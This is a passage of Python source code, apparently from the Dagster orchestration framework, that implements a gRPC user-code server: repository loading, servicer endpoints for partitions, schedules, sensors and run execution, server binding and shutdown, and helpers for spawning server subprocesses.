PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets, max_rx_bytes, max_send_bytes
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
    """Raised when the gRPC server cannot bind the requested port or socket."""
class LoadedRepositories:
    """Eagerly loads every repository reachable from a LoadableTargetOrigin.

    Construction resolves each loadable target into a code pointer and a
    ReconstructableRepository, and forces evaluation of all lazily defined
    pipelines/jobs so load errors surface at server start rather than on
    first request. With a falsy origin the instance stays empty (used for
    ping-only test servers).
    """

    def __init__(self, loadable_target_origin, entry_point):
        self._loadable_target_origin = loadable_target_origin
        # repo name -> CodePointer, exposed to ListRepositories responses
        self._code_pointers_by_repo_name = {}
        # repo name -> ReconstructableRepository, used by get_recon_repo
        self._recon_repos_by_name = {}
        self._loadable_repository_symbols = []
        if not loadable_target_origin:
            # No user code target configured; leave all maps empty.
            return
        loadable_targets = get_loadable_targets(
            loadable_target_origin.python_file,
            loadable_target_origin.module_name,
            loadable_target_origin.package_name,
            loadable_target_origin.working_directory,
            loadable_target_origin.attribute,
        )
        for loadable_target in loadable_targets:
            pointer = _get_code_pointer(loadable_target_origin, loadable_target)
            recon_repo = ReconstructableRepository(
                pointer,
                _get_current_image(),
                sys.executable,
                entry_point=entry_point,
            )
            repo_def = recon_repo.get_definition()
            # force load of all lazy constructed jobs/pipelines
            repo_def.get_all_pipelines()
            self._code_pointers_by_repo_name[repo_def.name] = pointer
            self._recon_repos_by_name[repo_def.name] = recon_repo
            self._loadable_repository_symbols.append(
                LoadableRepositorySymbol(
                    attribute=loadable_target.attribute,
                    repository_name=repo_def.name,
                )
            )

    @property
    def loadable_repository_symbols(self):
        """List of LoadableRepositorySymbol for every loaded repository."""
        return self._loadable_repository_symbols

    @property
    def code_pointers_by_repo_name(self):
        """Mapping of repository name to its CodePointer."""
        return self._code_pointers_by_repo_name

    def get_recon_repo(self, name: str) -> ReconstructableRepository:
        """Return the ReconstructableRepository for *name*; raises KeyError if unknown."""
        return self._recon_repos_by_name[name]
def _get_code_pointer(loadable_target_origin, loadable_repository_symbol):
    """Build a CodePointer for one repository symbol from its load origin.

    Dispatches on which loading mechanism the origin specifies, in priority
    order: a python file, an installed package, else a bare module.
    """
    attribute = loadable_repository_symbol.attribute
    working_directory = loadable_target_origin.working_directory
    if loadable_target_origin.python_file:
        return CodePointer.from_python_file(
            loadable_target_origin.python_file,
            attribute,
            working_directory,
        )
    if loadable_target_origin.package_name:
        return CodePointer.from_python_package(
            loadable_target_origin.package_name,
            attribute,
            working_directory,
        )
    return CodePointer.from_module(
        loadable_target_origin.module_name,
        attribute,
        working_directory,
    )
class DagsterApiServer(DagsterApiServicer):
    """gRPC servicer implementing the Dagster user-code API.

    Serves repository metadata, partition/schedule/sensor evaluation, and run
    execution. Each run executes in its own spawned multiprocessing process;
    bookkeeping for live runs is protected by an execution lock. Lifecycle is
    coordinated through threading events: an optional heartbeat thread shuts
    the server down when clients stop heartbeating, and a cleanup thread
    reaps orphaned run processes and performs the final termination once all
    executions have finished.
    """

    # The loadable_target_origin is currently Noneable to support instaniating a server.
    # This helps us test the ping methods, and incrementally migrate each method to
    # the target passed in here instead of passing in a target in the argument.
    def __init__(
        self,
        server_termination_event,
        loadable_target_origin=None,
        heartbeat=False,
        heartbeat_timeout=30,
        lazy_load_user_code=False,
        fixed_server_id=None,
        entry_point=None,
    ):
        super(DagsterApiServer, self).__init__()
        check.bool_param(heartbeat, "heartbeat")
        check.int_param(heartbeat_timeout, "heartbeat_timeout")
        check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
        self._server_termination_event = check.inst_param(
            server_termination_event, "server_termination_event", ThreadingEventType
        )
        self._loadable_target_origin = check.opt_inst_param(
            loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
        )
        # "spawn" avoids forking a process that already holds gRPC/thread state.
        self._mp_ctx = multiprocessing.get_context("spawn")
        # Each server is initialized with a unique UUID. This UUID is used by clients to track when
        # servers are replaced and is used for cache invalidation and reloading.
        self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
        # Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
        # hearbeat, at which point this event is set. The cleanup thread will then set the server
        # termination event once all current executions have finished, which will stop the server)
        self._shutdown_once_executions_finish_event = threading.Event()
        # Dict[str, (multiprocessing.Process, DagsterInstance)]
        self._executions = {}
        # Dict[str, multiprocessing.Event]
        self._termination_events = {}
        self._termination_times = {}
        self._execution_lock = threading.Lock()
        self._serializable_load_error = None
        self._entry_point = (
            frozenlist(check.list_param(entry_point, "entry_point", of_type=str))
            if entry_point != None
            else DEFAULT_DAGSTER_ENTRY_POINT
        )
        try:
            self._loaded_repositories = LoadedRepositories(
                loadable_target_origin, self._entry_point
            )
        except Exception:
            # With lazy loading, record the error and serve it from
            # ListRepositories instead of failing server startup.
            if not lazy_load_user_code:
                raise
            self._loaded_repositories = None
            self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
        self.__last_heartbeat_time = time.time()
        if heartbeat:
            self.__heartbeat_thread = threading.Thread(
                target=self._heartbeat_thread,
                args=(heartbeat_timeout,),
                name="grpc-server-heartbeat",
            )
            self.__heartbeat_thread.daemon = True
            self.__heartbeat_thread.start()
        else:
            self.__heartbeat_thread = None
        self.__cleanup_thread = threading.Thread(
            target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
        )
        self.__cleanup_thread.daemon = True
        self.__cleanup_thread.start()

    def cleanup(self):
        """Join the heartbeat/cleanup threads; call after server termination."""
        if self.__heartbeat_thread:
            self.__heartbeat_thread.join()
        self.__cleanup_thread.join()

    def _heartbeat_thread(self, heartbeat_timeout):
        """Request shutdown once no heartbeat has arrived within the timeout."""
        while True:
            self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
            if self._shutdown_once_executions_finish_event.is_set():
                break
            if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
                self._shutdown_once_executions_finish_event.set()

    def _cleanup_thread(self):
        """Periodically reap orphaned runs until the server terminates."""
        while True:
            self._server_termination_event.wait(CLEANUP_TICK)
            if self._server_termination_event.is_set():
                break
            self._check_for_orphaned_runs()

    def _check_for_orphaned_runs(self):
        """Mark runs whose subprocess died as failed, and clear their bookkeeping.

        Also performs the final server termination once a shutdown has been
        requested and no executions remain.
        """
        with self._execution_lock:
            runs_to_clear = []
            for run_id, (process, instance_ref) in self._executions.items():
                if not process.is_alive():
                    with DagsterInstance.from_ref(instance_ref) as instance:
                        runs_to_clear.append(run_id)
                        run = instance.get_run_by_id(run_id)
                        if not run or run.is_finished:
                            continue
                        # the process died in an unexpected manner. inform the system
                        message = (
                            f"Run execution process for {run.run_id} unexpectedly "
                            f"exited with exit code {process.exitcode}."
                        )
                        instance.report_engine_event(message, run, cls=self.__class__)
                        instance.report_run_failed(run)
            for run_id in runs_to_clear:
                self._clear_run(run_id)
            # Once there are no more running executions after we have received a request to
            # shut down, terminate the server
            if self._shutdown_once_executions_finish_event.is_set():
                if len(self._executions) == 0:
                    self._server_termination_event.set()

    # Assumes execution lock is being held
    def _clear_run(self, run_id):
        del self._executions[run_id]
        del self._termination_events[run_id]
        if run_id in self._termination_times:
            del self._termination_times[run_id]

    def _recon_repository_from_origin(
        self, external_repository_origin: ExternalRepositoryOrigin
    ) -> ReconstructableRepository:
        """Look up the preloaded ReconstructableRepository for an origin."""
        # could assert against external_repository_origin.repository_location_origin
        return self._loaded_repositories.get_recon_repo(external_repository_origin.repository_name)

    def _recon_pipeline_from_origin(self, external_pipeline_origin: ExternalPipelineOrigin):
        """Resolve a pipeline origin to a reconstructable pipeline."""
        recon_repo = self._recon_repository_from_origin(
            external_pipeline_origin.external_repository_origin
        )
        return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)

    def Ping(self, request, _context):
        """Echo back the request payload (liveness probe)."""
        echo = request.echo
        return api_pb2.PingReply(echo=echo)

    def StreamingPing(self, request, _context):
        """Stream `sequence_length` echo events (streaming liveness probe)."""
        sequence_length = request.sequence_length
        echo = request.echo
        for sequence_number in range(sequence_length):
            yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)

    def Heartbeat(self, request, _context):
        """Record a client heartbeat and echo back the payload."""
        self.__last_heartbeat_time = time.time()
        echo = request.echo
        return api_pb2.PingReply(echo=echo)

    def GetServerId(self, _request, _context):
        """Return this server's unique id (for client cache invalidation)."""
        return api_pb2.GetServerIdReply(server_id=self._server_id)

    def ExecutionPlanSnapshot(self, request, _context):
        """Build and return a serialized execution plan snapshot (or error)."""
        execution_plan_args = deserialize_json_to_dagster_namedtuple(
            request.serialized_execution_plan_snapshot_args
        )
        check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
        recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
        execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
            recon_pipeline, execution_plan_args
        )
        return api_pb2.ExecutionPlanSnapshotReply(
            serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
                execution_plan_snapshot_or_error
            )
        )

    def ListRepositories(self, request, _context):
        """Describe the loaded repositories, or the load error if loading failed."""
        if self._serializable_load_error:
            return api_pb2.ListRepositoriesReply(
                serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
                    self._serializable_load_error
                )
            )
        response = ListRepositoriesResponse(
            self._loaded_repositories.loadable_repository_symbols,
            executable_path=self._loadable_target_origin.executable_path
            if self._loadable_target_origin
            else None,
            repository_code_pointer_dict=self._loaded_repositories.code_pointers_by_repo_name,
            entry_point=self._entry_point,
        )
        return api_pb2.ListRepositoriesReply(
            serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
        )

    def ExternalPartitionNames(self, request, _context):
        """Return the partition names of a partition set (or an execution error)."""
        partition_names_args = deserialize_json_to_dagster_namedtuple(
            request.serialized_partition_names_args
        )
        check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
        recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
        return api_pb2.ExternalPartitionNamesReply(
            serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
                get_partition_names(
                    recon_repo,
                    partition_names_args.partition_set_name,
                )
            )
        )

    def ExternalNotebookData(self, request, _context):
        """Return the raw content of a notebook file by path."""
        notebook_path = request.notebook_path
        check.str_param(notebook_path, "notebook_path")
        return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))

    def ExternalPartitionSetExecutionParams(self, request, _context):
        """Stream serialized execution params for a set of partitions, chunked."""
        args = deserialize_json_to_dagster_namedtuple(
            request.serialized_partition_set_execution_param_args
        )
        check.inst_param(
            args,
            "args",
            PartitionSetExecutionParamArgs,
        )
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        serialized_data = serialize_dagster_namedtuple(
            get_partition_set_execution_param_data(
                recon_repo=recon_repo,
                partition_set_name=args.partition_set_name,
                partition_names=args.partition_names,
            )
        )
        yield from self._split_serialized_data_into_chunk_events(serialized_data)

    def ExternalPartitionConfig(self, request, _context):
        """Return the run config for a single partition (or an execution error)."""
        args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
        check.inst_param(args, "args", PartitionArgs)
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        return api_pb2.ExternalPartitionConfigReply(
            serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
                get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
            )
        )

    def ExternalPartitionTags(self, request, _context):
        """Return the tags for a single partition (or an execution error)."""
        partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
        check.inst_param(partition_args, "partition_args", PartitionArgs)
        recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
        return api_pb2.ExternalPartitionTagsReply(
            serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
                get_partition_tags(
                    recon_repo, partition_args.partition_set_name, partition_args.partition_name
                )
            )
        )

    def ExternalPipelineSubsetSnapshot(self, request, _context):
        """Return a snapshot of a pipeline restricted to a solid selection."""
        pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
            request.serialized_pipeline_subset_snapshot_args
        )
        check.inst_param(
            pipeline_subset_snapshot_args,
            "pipeline_subset_snapshot_args",
            PipelineSubsetSnapshotArgs,
        )
        return api_pb2.ExternalPipelineSubsetSnapshotReply(
            serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
                get_external_pipeline_subset_result(
                    self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
                    pipeline_subset_snapshot_args.solid_selection,
                )
            )
        )

    def _get_serialized_external_repository_data(self, request):
        """Serialize the full external repository data for a repository origin."""
        repository_origin = deserialize_json_to_dagster_namedtuple(
            request.serialized_repository_python_origin
        )
        check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
        recon_repo = self._recon_repository_from_origin(repository_origin)
        return serialize_dagster_namedtuple(
            external_repository_data_from_def(recon_repo.get_definition())
        )

    def ExternalRepository(self, request, _context):
        """Return repository data in a single (non-streaming) reply."""
        serialized_external_repository_data = self._get_serialized_external_repository_data(request)
        return api_pb2.ExternalRepositoryReply(
            serialized_external_repository_data=serialized_external_repository_data,
        )

    def StreamingExternalRepository(self, request, _context):
        """Stream repository data in STREAMING_CHUNK_SIZE chunks."""
        serialized_external_repository_data = self._get_serialized_external_repository_data(request)
        num_chunks = int(
            math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
        )
        for i in range(num_chunks):
            start_index = i * STREAMING_CHUNK_SIZE
            end_index = min(
                (i + 1) * STREAMING_CHUNK_SIZE,
                len(serialized_external_repository_data),
            )
            yield api_pb2.StreamingExternalRepositoryEvent(
                sequence_number=i,
                serialized_external_repository_chunk=serialized_external_repository_data[
                    start_index:end_index
                ],
            )

    def _split_serialized_data_into_chunk_events(self, serialized_data):
        """Yield StreamingChunkEvents covering *serialized_data* in fixed-size chunks."""
        num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
        for i in range(num_chunks):
            start_index = i * STREAMING_CHUNK_SIZE
            end_index = min(
                (i + 1) * STREAMING_CHUNK_SIZE,
                len(serialized_data),
            )
            yield api_pb2.StreamingChunkEvent(
                sequence_number=i,
                serialized_chunk=serialized_data[start_index:end_index],
            )

    def ExternalScheduleExecution(self, request, _context):
        """Evaluate a schedule tick and stream the serialized result, chunked."""
        args = deserialize_json_to_dagster_namedtuple(
            request.serialized_external_schedule_execution_args
        )
        check.inst_param(
            args,
            "args",
            ExternalScheduleExecutionArgs,
        )
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        serialized_schedule_data = serialize_dagster_namedtuple(
            get_external_schedule_execution(
                recon_repo,
                args.instance_ref,
                args.schedule_name,
                args.scheduled_execution_timestamp,
                args.scheduled_execution_timezone,
            )
        )
        yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)

    def ExternalSensorExecution(self, request, _context):
        """Evaluate a sensor tick and stream the serialized result, chunked."""
        args = deserialize_json_to_dagster_namedtuple(
            request.serialized_external_sensor_execution_args
        )
        check.inst_param(args, "args", SensorExecutionArgs)
        recon_repo = self._recon_repository_from_origin(args.repository_origin)
        serialized_sensor_data = serialize_dagster_namedtuple(
            get_external_sensor_execution(
                recon_repo,
                args.instance_ref,
                args.sensor_name,
                args.last_completion_time,
                args.last_run_key,
                args.cursor,
            )
        )
        yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)

    def ShutdownServer(self, request, _context):
        """Request a graceful shutdown once in-flight executions finish."""
        try:
            self._shutdown_once_executions_finish_event.set()
            return api_pb2.ShutdownServerReply(
                serialized_shutdown_server_result=serialize_dagster_namedtuple(
                    ShutdownServerResult(success=True, serializable_error_info=None)
                )
            )
        except:
            # Deliberately broad: always report the failure back to the client.
            return api_pb2.ShutdownServerReply(
                serialized_shutdown_server_result=serialize_dagster_namedtuple(
                    ShutdownServerResult(
                        success=False,
                        serializable_error_info=serializable_error_info_from_exc_info(
                            sys.exc_info()
                        ),
                    )
                )
            )

    def CancelExecution(self, request, _context):
        """Signal a running execution's termination event; success only if it was live."""
        success = False
        message = None
        serializable_error_info = None
        try:
            cancel_execution_request = check.inst(
                deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
                CancelExecutionRequest,
            )
            with self._execution_lock:
                if cancel_execution_request.run_id in self._executions:
                    self._termination_events[cancel_execution_request.run_id].set()
                    self._termination_times[cancel_execution_request.run_id] = time.time()
                    success = True
        except:
            # Deliberately broad: report the failure in the reply payload.
            serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
        return api_pb2.CancelExecutionReply(
            serialized_cancel_execution_result=serialize_dagster_namedtuple(
                CancelExecutionResult(
                    success=success,
                    message=message,
                    serializable_error_info=serializable_error_info,
                )
            )
        )

    def CanCancelExecution(self, request, _context):
        """Report whether a run is live and not already flagged for termination."""
        can_cancel_execution_request = check.inst(
            deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
            CanCancelExecutionRequest,
        )
        with self._execution_lock:
            run_id = can_cancel_execution_request.run_id
            can_cancel = (
                run_id in self._executions and not self._termination_events[run_id].is_set()
            )
        return api_pb2.CanCancelExecutionReply(
            serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
                CanCancelExecutionResult(can_cancel=can_cancel)
            )
        )

    def StartRun(self, request, _context):
        """Launch a run in a spawned subprocess and wait for it to report startup.

        Polls the subprocess's event queue until it reports success, an IPC
        error, or dies; failed runs are removed from the executions map before
        replying so CanCancelExecution never returns True for them.
        """
        if self._shutdown_once_executions_finish_event.is_set():
            return api_pb2.StartRunReply(
                serialized_start_run_result=serialize_dagster_namedtuple(
                    StartRunResult(
                        success=False,
                        message="Tried to start a run on a server after telling it to shut down",
                        serializable_error_info=None,
                    )
                )
            )
        try:
            execute_run_args = check.inst(
                deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
                ExecuteExternalPipelineArgs,
            )
            run_id = execute_run_args.pipeline_run_id
            recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
        except:
            # Deliberately broad: any deserialization/lookup failure is returned
            # to the client rather than crashing the RPC.
            return api_pb2.StartRunReply(
                serialized_start_run_result=serialize_dagster_namedtuple(
                    StartRunResult(
                        success=False,
                        message=None,
                        serializable_error_info=serializable_error_info_from_exc_info(
                            sys.exc_info()
                        ),
                    )
                )
            )
        event_queue = self._mp_ctx.Queue()
        termination_event = self._mp_ctx.Event()
        execution_process = self._mp_ctx.Process(
            target=start_run_in_subprocess,
            args=[
                request.serialized_execute_run_args,
                recon_pipeline,
                event_queue,
                termination_event,
            ],
        )
        with self._execution_lock:
            execution_process.start()
            self._executions[run_id] = (
                execution_process,
                execute_run_args.instance_ref,
            )
            self._termination_events[run_id] = termination_event
        success = None
        message = None
        serializable_error_info = None
        while success is None:
            sleep(EVENT_QUEUE_POLL_INTERVAL)
            # We use `get_nowait()` instead of `get()` so that we can handle the case where the
            # execution process has died unexpectedly -- `get()` would hang forever in that case
            try:
                dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
            except queue.Empty:
                if not execution_process.is_alive():
                    # subprocess died unexpectedly
                    success = False
                    message = (
                        "GRPC server: Subprocess for {run_id} terminated unexpectedly with "
                        "exit code {exit_code}".format(
                            run_id=run_id,
                            exit_code=execution_process.exitcode,
                        )
                    )
                    serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
            else:
                if isinstance(
                    dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
                ):
                    success = True
                elif isinstance(
                    dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
                ):
                    continue
                if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
                    success = False
                    message = dagster_event_or_ipc_error_message_or_done.message
                    serializable_error_info = (
                        dagster_event_or_ipc_error_message_or_done.serializable_error_info
                    )
        # Ensure that if the run failed, we remove it from the executions map before
        # returning so that CanCancel will never return True
        if not success:
            with self._execution_lock:
                self._clear_run(run_id)
        return api_pb2.StartRunReply(
            serialized_start_run_result=serialize_dagster_namedtuple(
                StartRunResult(
                    success=success,
                    message=message,
                    serializable_error_info=serializable_error_info,
                )
            )
        )

    def GetCurrentImage(self, request, _context):
        """Return the Docker image this server is running in (may be None)."""
        return api_pb2.GetCurrentImageReply(
            serialized_current_image=serialize_dagster_namedtuple(
                GetCurrentImageResult(
                    current_image=_get_current_image(), serializable_error_info=None
                )
            )
        )
def _get_current_image():
return os.getenv("DAGSTER_CURRENT_IMAGE")
@whitelist_for_serdes
class GrpcServerStartedEvent(NamedTuple("_GrpcServerStartedEvent", [])):
    """IPC event: the gRPC server bound its address and started serving."""
@whitelist_for_serdes
class GrpcServerFailedToBindEvent(NamedTuple("_GrpcServerFailedToBindEvent", [])):
    """IPC event: the gRPC server could not bind its port or socket."""
@whitelist_for_serdes
class GrpcServerLoadErrorEvent(
    NamedTuple("GrpcServerLoadErrorEvent", [("error_info", SerializableErrorInfo)])
):
    """IPC event: user code raised while the gRPC server was loading it."""

    def __new__(cls, error_info: SerializableErrorInfo):
        checked_error_info = check.inst_param(error_info, "error_info", SerializableErrorInfo)
        return super(GrpcServerLoadErrorEvent, cls).__new__(cls, checked_error_info)
def server_termination_target(termination_event, server):
    """Block until *termination_event* fires, then stop *server*.

    Intended to run on a dedicated thread so the main thread can wait on
    the gRPC server itself.
    """
    termination_event.wait()
    # We could make this grace period configurable if we set it in the ShutdownServer handler
    server.stop(grace=5)
class DagsterGrpcServer:
    """Owns a grpc.Server hosting a DagsterApiServer plus a health servicer.

    Validates host/port/socket configuration, binds the address at
    construction, and reports startup/bind/load failures over an optional IPC
    output stream so a parent process can react. `serve()` blocks until the
    servicer's termination event stops the server.
    """

    def __init__(
        self,
        host="localhost",
        port=None,
        socket=None,
        max_workers=None,
        loadable_target_origin=None,
        heartbeat=False,
        heartbeat_timeout=30,
        lazy_load_user_code=False,
        ipc_output_file=None,
        fixed_server_id=None,
        entry_point=None,
    ):
        check.opt_str_param(host, "host")
        check.opt_int_param(port, "port")
        check.opt_str_param(socket, "socket")
        check.opt_int_param(max_workers, "max_workers")
        check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
        check.invariant(
            port is not None if seven.IS_WINDOWS else True,
            "You must pass a valid `port` on Windows: `socket` not supported.",
        )
        check.invariant(
            (port or socket) and not (port and socket),
            "You must pass one and only one of `port` or `socket`.",
        )
        check.invariant(
            host is not None if port else True,
            "Must provide a host when serving on a port",
        )
        check.bool_param(heartbeat, "heartbeat")
        check.int_param(heartbeat_timeout, "heartbeat_timeout")
        self._ipc_output_file = check.opt_str_param(ipc_output_file, "ipc_output_file")
        check.opt_str_param(fixed_server_id, "fixed_server_id")
        check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
        check.invariant(
            max_workers is None or max_workers > 1 if heartbeat else True,
            "max_workers must be greater than 1 or set to None if heartbeat is True. "
            "If set to None, the server will use the gRPC default.",
        )
        self.server = grpc.server(
            ThreadPoolExecutor(max_workers=max_workers),
            compression=grpc.Compression.Gzip,
            options=[
                ("grpc.max_send_message_length", max_send_bytes()),
                ("grpc.max_receive_message_length", max_rx_bytes()),
            ],
        )
        self._server_termination_event = threading.Event()
        try:
            self._api_servicer = DagsterApiServer(
                server_termination_event=self._server_termination_event,
                loadable_target_origin=loadable_target_origin,
                heartbeat=heartbeat,
                heartbeat_timeout=heartbeat_timeout,
                lazy_load_user_code=lazy_load_user_code,
                fixed_server_id=fixed_server_id,
                entry_point=entry_point,
            )
        except Exception:
            # Report a user-code load failure to the parent process (if any)
            # before propagating.
            if self._ipc_output_file:
                with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                    ipc_stream.send(
                        GrpcServerLoadErrorEvent(
                            error_info=serializable_error_info_from_exc_info(sys.exc_info())
                        )
                    )
            raise
        # Create a health check servicer
        self._health_servicer = health.HealthServicer()
        health_pb2_grpc.add_HealthServicer_to_server(self._health_servicer, self.server)
        add_DagsterApiServicer_to_server(self._api_servicer, self.server)
        if port:
            server_address = host + ":" + str(port)
        else:
            server_address = "unix:" + os.path.abspath(socket)
        # grpc.Server.add_insecure_port returns:
        # - 0 on failure
        # - port number when a port is successfully bound
        # - 1 when a UDS is successfully bound
        res = self.server.add_insecure_port(server_address)
        if socket and res != 1:
            if self._ipc_output_file:
                with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                    ipc_stream.send(GrpcServerFailedToBindEvent())
            raise CouldNotBindGrpcServerToAddress(socket)
        if port and res != port:
            if self._ipc_output_file:
                with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                    ipc_stream.send(GrpcServerFailedToBindEvent())
            raise CouldNotBindGrpcServerToAddress(port)

    def serve(self):
        """Start the server and block until termination; then join/cleanup.

        Announces readiness over the health servicer and the IPC output file
        (if configured). A daemon thread watches the termination event and
        stops the server with a grace period.
        """
        # Unfortunately it looks like ports bind late (here) and so this can fail with an error
        # from C++ like:
        #
        # E0625 08:46:56.180112000 4697443776 server_chttp2.cc:40]
        # {"created":"@1593089216.180085000","description":"Only 1 addresses added out of total
        # 2 resolved","file":"src/core/ext/transport/chttp2/server/chttp2_server.cc",
        # "file_line":406,"referenced_errors":[{"created":"@1593089216.180083000","description":
        # "Unable to configure socket","fd":6,"file":
        # "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":217,
        # "referenced_errors":[{"created":"@1593089216.180079000",
        # "description":"Address already in use","errno":48,"file":
        # "src/core/lib/iomgr/tcp_server_utils_posix_common.cc","file_line":190,"os_error":
        # "Address already in use","syscall":"bind"}]}]}
        #
        # This is printed to stdout and there is no return value from server.start or exception
        # raised in Python that we can use to handle this. The standard recipes for hijacking C
        # stdout (so we could inspect this output and respond accordingly), e.g.
        # https://eli.thegreenplace.net/2015/redirecting-all-kinds-of-stdout-in-python/, don't seem
        # to work (at least on Mac OS X) against grpc, and in any case would involve a huge
        # cross-version and cross-platform maintenance burden. We have an issue open against grpc,
        # https://github.com/grpc/grpc/issues/23315, and our own tracking issue at
        self.server.start()
        # Note: currently this is hardcoded as serving, since both services are cohosted
        # pylint: disable=no-member
        self._health_servicer.set("DagsterApi", health_pb2.HealthCheckResponse.SERVING)
        if self._ipc_output_file:
            with ipc_write_stream(self._ipc_output_file) as ipc_stream:
                ipc_stream.send(GrpcServerStartedEvent())
        server_termination_thread = threading.Thread(
            target=server_termination_target,
            args=[self._server_termination_event, self.server],
            name="grpc-server-termination",
        )
        server_termination_thread.daemon = True
        server_termination_thread.start()
        self.server.wait_for_termination()
        server_termination_thread.join()
        self._api_servicer.cleanup()
class CouldNotStartServerProcess(Exception):
    """Raised when a spawned gRPC server subprocess never became reachable."""

    def __init__(self, port=None, socket=None):
        if port is not None:
            where = "port {port}".format(port=port)
        else:
            where = "socket {socket}".format(socket=socket)
        super(CouldNotStartServerProcess, self).__init__(
            "Could not start server with " + where
        )
def wait_for_grpc_server(server_process, client, subprocess_args, timeout=60):
    """Poll *client* until the spawned gRPC server answers a ping.

    Args:
        server_process: Popen handle for the spawned server subprocess.
        client: DagsterGrpcClient pointed at the server's address.
        subprocess_args: command used to launch the server (for error text).
        timeout: seconds to keep retrying before giving up.

    Raises:
        Exception: if the timeout elapses, or the subprocess exits before it
            ever responds (includes the most recent connection error / exit
            code in the message).
    """
    start_time = time.time()
    last_error = None
    while True:
        try:
            client.ping("")
            return
        except DagsterUserCodeUnreachableError:
            last_error = serializable_error_info_from_exc_info(sys.exc_info())
        if time.time() - start_time > timeout:
            raise Exception(
                f"Timed out waiting for gRPC server to start with arguments: \"{' '.join(subprocess_args)}\". Most recent connection error: {str(last_error)}"
            )
        # poll() is None while the process is still running; use an identity
        # check (was `!= None`) since a legitimate exit code may be falsy (0).
        if server_process.poll() is not None:
            raise Exception(
                f"gRPC server exited with return code {server_process.returncode} while starting up with the command: \"{' '.join(subprocess_args)}\""
            )
        sleep(0.1)
def open_server_process(
    port,
    socket,
    loadable_target_origin=None,
    max_workers=None,
    heartbeat=False,
    heartbeat_timeout=30,
    fixed_server_id=None,
    startup_timeout=20,
):
    """Spawn a `dagster api grpc` subprocess and wait until it is reachable.

    Exactly one of *port* or *socket* must be provided. Returns the Popen
    handle once the server answers a ping; terminates the subprocess and
    re-raises if startup fails or times out.
    """
    check.invariant((port or socket) and not (port and socket), "Set only port or socket")
    check.opt_inst_param(loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin)
    check.opt_int_param(max_workers, "max_workers")
    from dagster.core.test_utils import get_mocked_system_timezone
    mocked_system_timezone = get_mocked_system_timezone()
    executable_path = loadable_target_origin.executable_path if loadable_target_origin else None
    # Assemble the CLI invocation; flag order here mirrors the `dagster api
    # grpc` command's options.
    subprocess_args = (
        (
            get_python_environment_entry_point(executable_path)
            if executable_path
            else DEFAULT_DAGSTER_ENTRY_POINT
        )
        + ["api", "grpc"]
        + ["--lazy-load-user-code"]
        + (["--port", str(port)] if port else [])
        + (["--socket", socket] if socket else [])
        + (["-n", str(max_workers)] if max_workers else [])
        + (["--heartbeat"] if heartbeat else [])
        + (["--heartbeat-timeout", str(heartbeat_timeout)] if heartbeat_timeout else [])
        + (["--fixed-server-id", fixed_server_id] if fixed_server_id else [])
        + (["--override-system-timezone", mocked_system_timezone] if mocked_system_timezone else [])
        + (["--log-level", "WARNING"])  # don't log INFO messages for automatically spun up servers
        + (["--use-python-environment-entry-point"] if executable_path else [])
    )
    if loadable_target_origin:
